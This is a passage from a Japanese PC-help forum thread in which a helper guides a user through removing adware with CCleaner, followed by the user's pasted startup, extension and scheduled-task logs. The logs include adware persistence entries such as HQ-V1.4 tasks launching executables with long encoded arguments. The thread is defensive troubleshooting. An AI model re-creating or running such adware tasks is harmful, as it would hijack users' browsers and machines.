次に「Opera」タブ内の下記も同様に処置を。
>有効 Extension Browsers Apps 1.26.18 Opera Stable C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\ffhfoagmjcnkolneahbpagjcjjaeofbg\1.26.18_0

>有効 Extension HQ-V1.4 1.26.35 Opera Stable C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\lclfgoiloocdgalcloalohidgnfcbpin\1.26.35_0

続いて「Chrome」タブ内の下記も同様に処置です。
>有効 Extension Browsers Apps 12260.8815.4569 最初?Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm\12260.8815.4569_0

>有効 Extension FlexibleShopper 4.75 最初?Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\flnadehcbdhdllijcpefnpbbipaipbee\4.75

>無効 Extension G calize 180 最初?Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\peconnficnlajdpgfcjfmhjibkoijlbp\180

>有効 Extension HQ-V1.4 14112.9866.7746 最初?Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ifohbjbgfchkkfhphahclmkpgejiplfo\14112.9866.7746_0

>無効 Extension Internet Speed Tracker 12.9.6.19505 最初?Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kohoehgoafblafjinhplmhcbphgaaobc\12.9.6.19505_0

>無効 Extension Pink My Facebook 186 最初?Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okcdpfndmnjdijikpehblfeancekjcgo\186

>無効 Extension Shut Up 214 最初?Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\oklfoejikkmejobodofaimigojomlfim\214

そして「スケジュールされたタスク」タブ内の下記も同様に処置です。
>有効 Task 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-11 C:\Program Files (x86)\HQ-V1.4\14ee8834-7bd6-4eba-bb20-1e498ae70e2e-11.exe /XAljV=HY2lakge0jvtbGGe5PpXK3/dQWihWPr95uq/bBYrIc7LyKhycS1SCiZNXuH3TACgIWN9au1r+vPaVjikRFRZ18DmLXRaVJT53FISREEqH5hN+KswWe8gko5HsANSIHjzfbRzC9IVfRWOIj8WuEqpxfLuLk941UPEUrGgh3Ef84co58V4lUioKrr/hjHsKWzzlxu/0oFGgkQcT4kiu46bpkrU1Ijmds8GvudWMu+xUbjhNkAxOsMsKuiBIAoBF4VO/dJmjl1h2XCWj+W9pV5/vQcHDb2kpLJyQGZffWMEqKSjUxMTZVkVjjR7ozTolPZjyM8zPSmEpLb+0OU+UfsAC5K/Ykwbysfwez2+wkyHgpI1Ju8yvP+n3vwdUQGSjrnvAfWD4Y1ZVq0YdReVHl3e27dgXAsZWliBWpbATnBj50EDJIqQmwzagiC+DRLfJcNI5JL/IaxlK3s271tu1gb+XmgalF6lr6aGqTD+O4HsXzgPVoAVs3fs45ffIKnexmqCbd9BKsMPWke5kcZglC60vGTiDASBMYdvht3wTFldwQdpm77MQY+3SjumQ7sdE4yOFjhXJbg44jkCWMSenGLEjUItMHWiH8eQO3Lp8dLUkJwb7PLSGNPb7OWZ4WJm7UdJ3n6lELRhmiRBPJ2fD1zBsUMaNgNu8ET+El6XBxTuuagBHYYfnEJOkxCH0m4Y05JS0/7iU91nliLaAn8Z1DsB5P6f0PVuWeKmb9eonLSxdqhKU2gxNcjcrudthMVcrgsidQXgfkJAg9tumLL4ZA29qBvydrRmla19tisZViuBNtBxMvFNoXJ/At3lsCF38uzS/VfB3tbVM75IiCzShCb9Y8AgnBAh4JbN2UTGPrWW/6TqnrlHxEew4c6X681byyQkGrQn1AOYAxSe60EuuMs4GH6/Ds+UFNW9M01RqKod4z7+mo98CoQ5y1h+27dW/GbGqF5fkkfiUmNFgecJLSM6myRXFqd1I4v5CM7qe/6oODRWVC07HrtNMWhQXKHAia98vGIOdcURPO3/tgc6r0XDw6GSRwLofjChwwbraF9+Nn9bQhKS0vcWHoubtru5kkiqTJ/91KC8Xw6baa8USBXGL78j0ntLGHtHQoFveuhCg8txRIiRM/MHiVfDdERz3PUZ+rHFkI/rkGmsFFh3kYSY+dBFjhxm8tIUHmKbZiLsxw1mPLKDnd+iKA6vihiSqHx8pWF0o5E/hUM216tllnBf6/zKhx3b7W8gFoobKLRX5FyxEFeBuS2HCIomWyDvFgM+Q+yG98EJGufN23u4IeRugYRDIaR+jOVJvO8ijLa1JcO/qO0v5XT0ixwK+JGrzD1htba/pTrDvYwGvaH7s29jmR+LlOq2UFgiHfYv9FoQb6zYz7e29EqAPnc5qytTFuJW2C7/CE10LROZ5vM58cLo3OmdjY83HdjuVwKhe1XfB6Qi9bAsppHZnrmRcq22cfUJnFBqLWy9YpwX2ufDrYGkADOarlqu94eNUG6qaO6ygx1p5+Nsuss6+UzszffWfSj7

>有効 Task 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-3 C:\Program Files (x86)\HQ-V1.4\14ee8834-7bd6-4eba-bb20-1e498ae70e2e-3.exe /XAljV=hpjCgC6ZaECmG1XheHRnE0/IvydM4QBVBkc238SQ+QDR6BY9oQ8+eaP97gS3EYbobIPtYHVwdT7Mwp5lrsjwqftlwBYeqCnRRJOg/d2EN6pJMDq32EpWcArNjfYZ2ZTWMHjyESVpP3JUv1x/ZXQzMQPeAvg3FybHeV5KHGCtWaU5tG2cCiqrL+9rsQ2+R0eLvrU74v1bVDx+Q4YnRSlZ4VfW6mXJqqnvIwoy4nScZlJRA6/XbX1XWl5bn05g98a6fODm+SOf5uLrCNUMR+mb8xTdap8meZtOWHEYBESkdtIuVB67KGsRdHBv4aiBTXJiXOeZNgjD76dzgptpGqFb1TyPthTLpqD5xbgQD4udrVQnfs+/2cHInZ8V25abk/GOwrOa0lnEwzYhwwYhsDyuVRkuCdA3NB/v6EQtiGScJ3hCwjneBOUCD1udg1PPEBQLXOTAQJhslJfnkYiVqZfgW+0Pr7OVgHyn3zln+NUOBVUW/bAKNG6jwUOdlBbkOViqujn4iK0/c5mPE35OE0H0XhMI0tt8g+VH6YQpAFvwsnZxdiY0cb5VMMVh+3rzl0qNaYlerVF4BLnYp4FaPLeDC4GUEpbpDvQ5AixeJOxbu6QD9kcctLLtg9zrPnYB3L92PB8165rPOqZzPCiArJJ6we3Lk7rjipyqyIa7r3yVhPLFVeNZh4E0+P0BFmk/0EgKJH2LMT4o/VsWJBTPbIItG7/w1xno/a3IRQYoMRrdB70Ssz4+AnF1WBzDmCwdgTSbLAN9cX0vIsZMpssN0RIOhoUSq30ipC0pILyXFBEPvH2g0/6tNU/dCQy8BOerXbBkykUZ2WJrHiZOehsLsmLTRQaKAn76WwHK0WZehTRGsu9Bv4WSPjScFCzq3nC1OTXTEIwYe32xZgv9JAxbkpfe0wjIpCE0RrT60qK/zpIw9FNlyD7R4amjHVKOZ5vsh9c+op+RuCkffDQWMiuzy50k6UXjujrNnZsthY7yc3jp9t57gRDBEOEIVleYiv09U+hO

>有効 Task ASP "C:\Program Files (x86)\RCP\systweakasp.exe" /verysilent

>有効 Task Driver Booster SkipUAC (Owner) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe /skipuac

>有効 Task PC SpeedScan Pro_Owner-PC@Owner C:\Program Files (x86)\Ascentive\PC SpeedScan Pro\PCSpeedScan.exe

>有効 Task Performance Center@Logon C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe -m

>有効 Task Performance Center_Owner-PC@Owner C:\Program Files (x86)\Ascentive\Performance Center\APCMain.exe

>有効 Task Yahoo! Search C:\Users\Owner\AppData\Local\Pay-By-Ads\Yahoo! Search\1.3.15.4\dsrlte.exe

有効 Task Yahoo! Search Updater C:\Users\Owner\AppData\Local\Pay-By-Ads\Yahoo! Search\1.3.15.4\dsrsetup.exe
このスケジュール内に食い込んだものを叩かないと、いくら処置しても復活します。
特に長々しいエントリが曲者です。

そして「コンテキストメニュー」タブ内の下記も同様に処置です。
>有効 Directory Advanced SystemCare

>有効 File Advanced SystemCare

ここまでできたら一度PC再起動後、各ブラウザを順番に起動してしばらく様子見した後、またCCでの各タブのログを取り直して、それらを様子見後の状態報告とともにレスください
  • 悪代官
  • 2015/04/28 (Tue) 20:37:00
Re: パソコン動作緩慢・広告類がひどい
アドバイスありがとうございます。
言われたことを行ってみました。
google chromeはプラウザが保護しており実行できませんでした。
まだ、広告はでます。
次にどうしたら良いでしょうか?

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run EPLTarget\P0000000000000000 SEIKO EPSON CORPORATION C:\windows\system32\spool\DRIVERS\x64\3\E_IATIHKJ.EXE /EPT "EPLTarget\P0000000000000000" /M "PX-404A"
有効 HKLM:Run cAudioFilterAgent Conexant Systems, Inc. C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe
有効 HKLM:Run EEventManager SEIKO EPSON CORPORATION "C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe"
有効 HKLM:Run HotKeysCmds Intel Corporation C:\windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\windows\system32\igfxtray.exe
有効 HKLM:Run IME14 JPN Setup Microsoft Corporation C:\PROGRA~2\COMMON~1\MICROS~1\IME14\SHARED\IMEKLMG.EXE /SetPreload /JPN /Log
有効 HKLM:Run IntelPAN Intel(R) Corporation "C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" /tf Intel PAN Tray
有効 HKLM:Run LLHDUSER Intercom, Inc. "C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe"
有効 HKLM:Run NTTW_OSA_AUS 西日本電信電話株式会社 "C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe" -silent
有効 HKLM:Run Persistence Intel Corporation C:\windows\system32\igfxpers.exe
有効 HKLM:Run Platinum Trend Micro Inc. "C:\Program Files\NTTW\Security\SEC\plugin\Pt\PtSessionAgent.exe" -StartUp
有効 HKLM:Run SmartAudio Conexant systems, Inc. C:\Program Files\CONEXANT\SAII\SAIICpl.exe /t
有効 HKLM:Run SynTPEnh Synaptics Incorporated %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
有効 HKLM:Run TCrdMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
有効 HKLM:Run Teco "%ProgramFiles%\TOSHIBA\TECO\Teco.exe" /r
有効 HKLM:Run ToshibaPlacesGadget TOSHIBA CORPORATION "C:\Program Files (x86)\Toshiba Places Gadget\ToshibaPlacesGadget.exe" -atboottime
有効 HKLM:Run ToshibaServiceStation TOSHIBA Corporation "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
有効 HKLM:Run TosNC TOSHIBA Corporation %ProgramFiles%\Toshiba\BulletinBoard\TosNcCore.exe
有効 HKLM:Run TosReelTimeMonitor TOSHIBA Corporation %ProgramFiles%\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
有効 HKLM:Run TosSENotify TOSHIBA Corporation C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe
有効 HKLM:Run TosWaitSrv TOSHIBA Corporation %ProgramFiles%\TOSHIBA\TPHM\TosWaitSrv.exe
有効 HKLM:Run TouchFree TOSHIBA Corporation C:\Program Files (x86)\TOSHIBA\TouchFree\TouchFreeTray.exe
有効 HKLM:Run TPSCMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\PeakShift\TPSCMain.exe
有効 HKLM:Run TPwrMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE
有効 HKLM:Run Trend Micro Client Framework Trend Micro Inc. "C:\Program Files\NTTW\Security\UniClient\UiFrmWrk\UIWatchDog.exe"
有効 HKLM:Run TSleepSrv TOSHIBA %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
有効 HKLM:Run TSUScheduler TOSHIBA Corporation %ProgramFiles(x86)%\TOSHIBA\Sync Utility\TosSyncScheduler.exe
有効 HKLM:Run Unattend0000000001{7EEC0247-1AD3-4C6D-95A0-BC5399CB7B8A} AnywhereWorking L.T.D. C:\tosutils\palakidou\palakidou.exe
有効 Startup Common クライアントマネージャV.lnk BUFFALO INC. C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe

有効 Extension OneNote に送る Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote に送る Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom64.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Extension 故障かな?と思ったら・・・ 西日本電信電話株式会社 C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
無効 Helper E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Helper E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
有効 Helper ExplorerWnd Helper IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe64.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll
無効 Helper Windows Live ID Sign-in Helper Microsoft Corp. C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper Windows Live ID サインイン ヘルパー Microsoft Corp. C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon64.dll
無効 Toolbar E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Toolbar E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll
有効 Extension OneNote に送る Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote に送る Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom64.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Extension 故障かな?と思ったら・・・ 西日本電信電話株式会社 C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
無効 Helper E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Helper E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
有効 Helper ExplorerWnd Helper IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe64.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll
無効 Helper Windows Live ID Sign-in Helper Microsoft Corp. C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper Windows Live ID サインイン ヘルパー Microsoft Corp. C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon64.dll
無効 Toolbar E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Toolbar E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll

無効 Extension Browsers Apps 0.95.18 browser default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\herman.thorne45@outlook.com
無効 Extension ClickForSale 1.9 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\Na@4skpeF6a.org
無効 Extension E-Web Print 1.09.00 SEIKO EPSON CORPORATION default C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on
無効 Extension Hold Page 1.0.1 Hold Page default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\{15738250-181b-41cd-b01d-621a833a541c}.xpi
無効 Extension ProShopper 4.87 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\w1@bVfSQOc5.com
無効 Extension SilentBlockschuzakjp 0.95.949 Schuzak default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\SilentBlock@schuzak.jp
無効 Extension Skype Click to Call 7.3.16540.9015 Microsoft Corporation default C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi
無効 Extension Trend Micro BEP Firefox Extension 7.5.0.1144 Trend Micro default C:\Program Files\NTTW\Security\AMSP\Module\20002\7.5.1144\7.5.1144\firefoxextension
無効 Extension Trend Micro NSC Firefox Extension 6.8.0.1096 Trend Micro default C:\Program Files\NTTW\Security\AMSP\module\20004\FxExt\firefoxextension
無効 Extension セキュリティツールバー 6.11.0.3085 繝医Ξ繝ウ繝峨・繧、繧ッ繝ュ default C:\Program Files\NTTW\Security\SEC\UIFramework\Toolbar\firefoxextension
有効 Plugin Adobe Acrobat 11.0.10.32 default C:\Program Files (x86)\Adobe\Reader 11.0\Reader\browser\nppdf32.dll
有効 Plugin Microsoft Office 2010 14.0.4730.1010 Microsoft Corporation default C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL
有効 Plugin Microsoft Office 2010 14.0.4761.1000 Microsoft Corporation default C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL
有効 Plugin Nexon Game Controller 1.0.1.2 Nexon default C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin Shockwave Flash 16.0.0.305 default C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll
有効 Plugin Silverlight Plug-In 5.1.30514.0 Microsoft Corporation default c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3502.922 Microsoft Corporation default C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll

無効 Extension AirDroid Notifier 102 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\imlonnilcaednlloaadgddbjfliioklh\102
有効 Extension Browsers Apps 12260.8815.4569 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdmclgnbhdiklglmmdcaelggigiiigpm\12260.8815.4569_0
有効 Extension FlexibleShopper 4.75 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\flnadehcbdhdllijcpefnpbbipaipbee\4.75
無効 Extension G calize 180 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\peconnficnlajdpgfcjfmhjibkoijlbp\180
有効 Extension HQ-V1.4 14112.9866.7746 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ifohbjbgfchkkfhphahclmkpgejiplfo\14112.9866.7746_0
無効 Extension Internet Speed Tracker 12.9.6.19505 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kohoehgoafblafjinhplmhcbphgaaobc\12.9.6.19505_0
無効 Extension Pink My Facebook 186 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okcdpfndmnjdijikpehblfeancekjcgo\186
無効 Extension Shut Up 214 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\oklfoejikkmejobodofaimigojomlfim\214
有効 Extension Trend ツールバー 8.0.0.1257 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohhcpmplhhiiaoiddkfboafbhiknefdf\8.0.0.1257_0
有効 Plugin Adobe Acrobat 10.1.4.38 最初�Eユーザー C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll
有効 Plugin Chrome PDF Viewer 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.90\pdf.dll
有効 Plugin Chrome Remote Desktop Viewer 最初�Eユーザー internal-remoting-viewer
有効 Plugin Google Update 1.3.21.123 最初�Eユーザー C:\Program Files (x86)\Google\Update\1.3.21.123\npGoogleUpdate3.dll
有効 Plugin Java Deployment Toolkit 6.0.200.2 6.0.200.2 最初�Eユーザー C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 6 U20 6.0.200.2 最初�Eユーザー C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll
有効 Plugin Microsoft Office 2010 14.0.4730.1010 最初�Eユーザー C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL
有効 Plugin Microsoft Office 2010 14.0.4761.1000 最初�Eユーザー C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL
有効 Plugin Native Client 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.90\ppGoogleNaClPluginChrome.dll
有効 Plugin Shockwave Flash 11.4.31.110 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.90\PepperFlash\pepflashplayer.dll
有効 Plugin Silverlight Plug-In 4.1.10329.0 最初�Eユーザー c:\Program Files (x86)\Microsoft Silverlight\4.1.10329.0\npctrl.dll
有効 Plugin Trend Micro Titanium 5.11.0.2107 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\heoldelcflnigdllmlopiefhkkobendj\5.11.0.2107_0\npToolbarChrome.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3502.0922_ship.wlx.w4m4 (ship) 最初�Eユーザー C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll

無効 Extension Browsers Apps 1.26.18 Opera Stable C:\Users\Owner\AppData\Roaming\Opera Software\Opera Stable\Extensions\ffhfoagmjcnkolneahbpagjcjjaeofbg\1.26.18_0

無効 Task 14ee8834-7bd6-4eba-bb20-1e498ae70e2e-11 C:\Program Files (x86)\HQ-V1.4\14ee8834-7bd6-4eba-bb20-1e498ae70e2e-11.exe /XAljV=HY2lakge0jvtbGGe5PpXK3/dQWihWPr95uq/bBYrIc7LyKhycS1SCiZNXuH3TACgIWN9au1r+vPaVjikRFRZ18DmLXRaVJT53FISREEqH5hN+KswWe8gko5HsANSIHjzfbRzC9IVfRWOIj8WuEqpxfLuLk941UPEUrGgh3Ef84co58V4lUioKrr/hjHsKWzzlxu/0oFGgkQcT4kiu46bpkrU1Ijmds8GvudWMu+xUbjhNkAxOsMsKuiBIAoBF4VO/dJmjl1h2XCWj+W9pV5/vQcHDb2kpLJyQGZffWMEqKSjUxMTZVkVjjR7ozTolPZjyM8zPSmEpLb+0OU+UfsAC5K/Ykwbysfwez2+wkyHgpI1Ju8yvP+n3vwdUQGSjrnvAfWD4Y1ZVq0YdReVHl3e27dgXAsZWliBWpbATnBj50EDJIqQmwzagiC+DRLfJcNI5JL/IaxlK3s271tu1gb+XmgalF6lr6aGqTD+O4HsXzgPVoAVs3fs45ffIKnexmqCbd9BKsMPWke5kcZglC60vGTiDASBMYdvht3wTFldwQdpm77MQY+3SjumQ7sdE4yOFjhXJbg44jkCWMSenGLEjUItMHWiH8eQO3Lp8dLUkJwb7PLSGNPb7OWZ4WJm7UdJ3n6lELRhmiRBPJ2fD1zBsUMaNgNu8ET+El6XBxTuuagBHYYfnEJOkxCH0m4Y05JS0/7iU91nliLaAn8Z1DsB5P6f0PVuWeKmb9eonLSxdqhKU2gxNcjcrudthMVcrgsidQXgfkJAg9tumLL4ZA29qBvydrRmla19tisZViuBNtBxMvFNoXJ/At3lsCF38uzS/VfB3tbVM75IiCzShCb9Y8AgnBAh4JbN2UTGPrWW/6TqnrlHxEew4c6X681byyQkGrQn1AOYAxSe60EuuMs4GH6/Ds+UFNW9M01RqKod4z7+mo98CoQ5y1h+27dW/GbGqF5fkkfiUmNFgecJLSM6myRXFqd1I4v5CM7qe/6oODRWVC07HrtNMWhQXKHAia98vGIOdcURPO3/tgc6r0XDw6GSRwLofjChwwbraF9+Nn9bQhKS0vcWHoubtru5kkiqTJ/91KC8Xw6baa8USBXGL78j0ntLGHtHQoFveuhCg8txRIiRM/MHiVfDdERz3PUZ+rHFkI/rkGmsFFh3kYSY+dBFjhxm8tIUHmKbZiLsxw1mPLKDnd+iKA6vihiSqHx8pWF0o5E/hUM216tllnBf6/zKhx3b7W8gFoobKLRX5FyxEFeBuS2HCIomWyDvFgM+Q+yG98EJGufN23u4IeRugYRDIaR+jOVJvO8ijLa1JcO/